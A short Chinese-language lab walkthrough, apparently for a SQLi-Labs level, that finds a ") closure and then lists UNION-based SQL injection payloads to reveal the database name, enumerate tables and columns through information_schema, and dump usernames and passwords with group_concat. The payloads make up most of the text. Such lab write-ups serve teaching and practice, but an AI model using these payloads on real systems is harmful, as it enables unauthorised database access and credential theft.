0X01摘要体现(小编这里傻逼了 可以直接用group_concat函数绕过显示问题我还在用limit绕过)
还是这个模块 我们很熟徐那么先来尝试一下
单引号加入
无报错信息 哦豁 加入双引号试试呐
哦豁 好像报错 了 还多了一个括号 那我们尝试一下闭合语句
") order by 1 #
好像成功闭合了 哈哈 看来没有猜错 元语句应该是 id=("")
那都知道了语句的闭合原理 那我们 开始我们的注入旅途吧 OK let’s go
0X02爱之初体验 爆数据库
") union select null,database()#
0X03就是一套组合拳了 爆破表名
") union select null,table_name from information_schema.tables where table_schema='security'#
老规矩 他只显示了一个数据 我们可以用limit函数来一个一个拆解出来 嘿嘿
") union select null,table_name from information_schema.tables where table_schema='security'limit 1,1#
0X04继续我们的组合拳 爆破列名
")union select null,column_name from information_schema.columns where table_name='users' limit 0,1#
0X05组合拳打到底 爆破字段名
") union select null,group_concat(username,0x3a,password) from users#
舒舒服服
完结
切记 慢就是快